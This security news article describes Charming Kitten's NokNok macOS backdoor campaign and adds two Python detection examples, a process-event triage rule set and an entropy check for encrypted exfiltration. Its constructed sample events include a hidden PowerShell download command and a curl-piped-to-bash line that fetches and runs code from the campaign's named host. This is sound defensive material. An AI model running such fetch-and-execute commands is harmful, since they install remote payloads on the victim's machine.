Charming Kitten Hackers Target Mac Users With New Malware
Cybersecurity researchers have uncovered a new Charming Kitten campaign using a newly identified malware named NokNok. The campaign, which began in May, shows the group adapting its infection chains and increasingly targeting macOS systems.
Charming Kitten (also known as APT42 or Phosphorus), a threat group linked to Iran, has been involved in over 30 operations across 14 countries since 2015, according to Mandiant. The group is known for its persistent attacks on diplomats, government officials, and foreign policy experts.
According to a report published on July 6 by Proofpoint, Charming Kitten has changed its tactics in this latest campaign, moving away from malicious Microsoft Word documents with macros and instead using LNK files as the infection vector. The LNK files act as carriers for the malware payloads, a departure from the group's usual techniques.
The group opens its attacks by posing as nuclear experts and targeting individuals with a strong interest in Middle Eastern affairs and nuclear security. It uses carefully crafted phishing emails to engage targets, often adopting multiple personas to make the conversations seem more credible.
Charming Kitten targets Windows-based systems by sending a malicious link leading to a Google Script macro. This redirects victims to a Dropbox URL hosting a password-protected RAR archive containing a dropper with PowerShell code and an LNK file. These components work together to stage the malware from a cloud hosting provider. The final payload, GorjolEcho backdoor, allows remote command execution. To avoid detection, GorjolEcho opens a decoy PDF document relevant to prior conversations, reducing suspicion.
Upon realizing that their initial malware could not run on macOS, Charming Kitten adapted their strategy. They targeted macOS users by sending a link to a fake RUSI (Royal United Services Institute) VPN app hosted on "library-store.camdvr.org." This ZIP archive contains a customized Mac application disguised as a VPN client. Upon execution, the app invokes a bash script called NokNok, establishing a backdoor on the victim's system.
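The two infection chains described above (a Windows LNK launching PowerShell that fetches a cloud-hosted payload, and a macOS application bundle invoking a bash script) have a recognisable shape in process-creation telemetry. The following rule-based triage is an added example for this article, not code from Proofpoint or from the campaign itself. The event schema and field names are an assumption rather than any real EDR format, all sample events are constructed, the application bundle name and URL paths are placeholders, and the article only names `library-store.camdvr.org` as the ZIP host and Dropbox as the RAR host; treating either as a second-stage download source in the sample data is an assumption for illustration.

```python
"""Rule-based triage of process-creation events for the LNK -> PowerShell
chain on Windows and the .app -> bash chain on macOS described in the article.
Added example; event format is assumed, sample events are constructed."""
import re
from dataclasses import dataclass

# Hosts the article names as staging points (assumed here to appear in the
# command line of the child process that fetches the next stage).
STAGING_HOSTS = {"library-store.camdvr.org", "dropbox.com"}
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)


@dataclass
class ProcEvent:
    host_os: str   # "windows" or "macos" (assumed field)
    parent: str    # parent process image path
    image: str     # child process image path
    cmdline: str   # child command line


def hosts_in(cmdline: str) -> set:
    """Lower-cased hostnames of every URL found in a command line."""
    return {m.group(1).lower() for m in URL_RE.finditer(cmdline)}


def is_staging_host(host: str) -> bool:
    """Exact or subdomain match against the article's named hosts."""
    return any(host == s or host.endswith("." + s) for s in STAGING_HOSTS)


def lnk_powershell_rule(ev: ProcEvent):
    """Windows: explorer.exe (which launches LNK shortcuts) spawning PowerShell
    whose command line reaches out to a URL matches the LNK-based chain."""
    if ev.host_os != "windows":
        return None
    if not ev.parent.lower().endswith("explorer.exe"):
        return None
    if not ev.image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return None
    return "lnk-powershell-download" if hosts_in(ev.cmdline) else None


def app_bundle_shell_rule(ev: ProcEvent):
    """macOS: an executable inside a .app bundle spawning a shell that
    fetches from a URL matches the fake-VPN-app chain."""
    if ev.host_os != "macos":
        return None
    if ".app/Contents/MacOS/" not in ev.parent:
        return None
    if ev.image not in ("/bin/bash", "/bin/sh", "/bin/zsh"):
        return None
    if hosts_in(ev.cmdline) or "curl " in ev.cmdline:
        return "app-bundle-shell-download"
    return None


def triage(events):
    """Return (index, rule_name, severity) for every event a rule matched.
    Severity is 'high' when a contacted host is one the article names."""
    hits = []
    for i, ev in enumerate(events):
        for rule in (lnk_powershell_rule, app_bundle_shell_rule):
            name = rule(ev)
            if name:
                known = any(is_staging_host(h) for h in hosts_in(ev.cmdline))
                hits.append((i, name, "high" if known else "medium"))
    return hits


# Constructed sample telemetry (not real logs). Paths marked EXAMPLE are placeholders.
SAMPLE_EVENTS = [
    ProcEvent("windows", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -c "iwr https://www.dropbox.com/s/EXAMPLE/a.txt -OutFile $env:TEMP\\a.txt"'),
    ProcEvent("windows", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt"),
    ProcEvent("windows", r"C:\Program Files\Git\git-bash.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -c "iwr https://intranet.example/status"'),
    ProcEvent("macos", "/Users/u/Downloads/EXAMPLE VPN.app/Contents/MacOS/EXAMPLE VPN",
              "/bin/bash", 'bash -c "curl -s https://library-store.camdvr.org/EXAMPLE | bash"'),
    ProcEvent("macos", "/Applications/Terminal.app/Contents/MacOS/Terminal",
              "/bin/zsh", "zsh -l"),
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

The third event shows the main false-positive control: PowerShell downloading from the network is routine, so the rule keys on the LNK-launching parent rather than on PowerShell alone. Legitimate `.app` bundles that shell out without contacting a URL, like the Terminal event, are left alone for the same reason.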
NokNok, featuring four discrete modules, collects system information such as the OS version, running processes, installed applications, and network details. This information is then encrypted, base64 encoded, and exfiltrated to the threat actor's command and control (C2) server.
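A request body that carries host data after it has been encrypted and then base64 encoded has a measurable signature: the decoded blob is large and close to 8 bits of entropy per byte, unlike base64-wrapped JSON or text. The heuristic below is an added example for this article, not NokNok's code or Proofpoint's detection; the request bodies are constructed, the "ciphertext" is simulated with a deterministic SHA-256-based byte stream rather than any cipher the malware uses, and the thresholds are assumptions to tune against real traffic. The caveat it also demonstrates: inventory sent as plain base64-wrapped JSON is not flagged, since the entropy test only catches the encrypted form.

```python
"""Entropy heuristic for base64-wrapped encrypted exfiltration in request
bodies. Added example; sample bodies are constructed and the ciphertext is
simulated, not produced by the malware's cipher."""
import base64
import hashlib
import json
import math
import re

# A run of at least 64 base64 characters with optional padding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: ~8.0 for encrypted or compressed data, ~4-5 for ASCII text."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def find_encoded_blobs(body: str):
    """Decode every long base64 run in a body and report where it sits,
    how many bytes it decodes to, and the entropy of the decoded bytes."""
    blobs = []
    for m in B64_TOKEN.finditer(body):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        blobs.append({"offset": m.start(), "decoded_len": len(raw),
                      "entropy": round(shannon_entropy(raw), 2)})
    return blobs


def flag_exfil(body: str, min_bytes: int = 512, min_entropy: float = 7.5) -> bool:
    """Flag a body containing a base64 blob that decodes to a sizeable,
    high-entropy payload. Thresholds are assumptions for illustration."""
    return any(b["decoded_len"] >= min_bytes and b["entropy"] >= min_entropy
               for b in find_encoded_blobs(body))


def pseudo_random(n: int, seed: bytes = b"constructed-seed") -> bytes:
    """Deterministic stand-in for ciphertext so the example runs offline."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out.extend(block)
    return bytes(out[:n])


# Constructed sample inventory of the kind the article says NokNok gathers.
HOST_INFO = json.dumps({
    "os": "macOS 13.4",
    "procs": ["launchd", "Finder", "Safari"] * 40,
    "apps": ["Safari", "Mail", "Notes"] * 40,
    "net": {"ip": "192.0.2.10", "gw": "192.0.2.1"},
}).encode()

# Same data, base64-wrapped in the clear: low entropy, not flagged by this heuristic.
PLAINTEXT_BODY = "report=" + base64.b64encode(HOST_INFO).decode()
# Simulated encrypted form of the same data: high entropy, flagged.
SUSPECT_BODY = "id=7&data=" + base64.b64encode(pseudo_random(len(HOST_INFO))).decode()

if __name__ == "__main__":
    for label, body in (("plaintext", PLAINTEXT_BODY), ("suspect", SUSPECT_BODY)):
        print(label, find_encoded_blobs(body), flag_exfil(body))
```

Pairing this with destination context (a newly seen domain, a cloud host not used elsewhere in the estate) is what makes it actionable; on its own, high-entropy base64 also describes legitimate uploads of compressed or encrypted files.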
Charming Kitten's ability to adapt its infection chains using various cloud hosting providers demonstrates its persistence and determination to carry out cyber espionage operations. The group's continuous evolution underscores the importance of a strong defense and collaborative efforts within the cybersecurity community to thwart even the most advanced adversaries.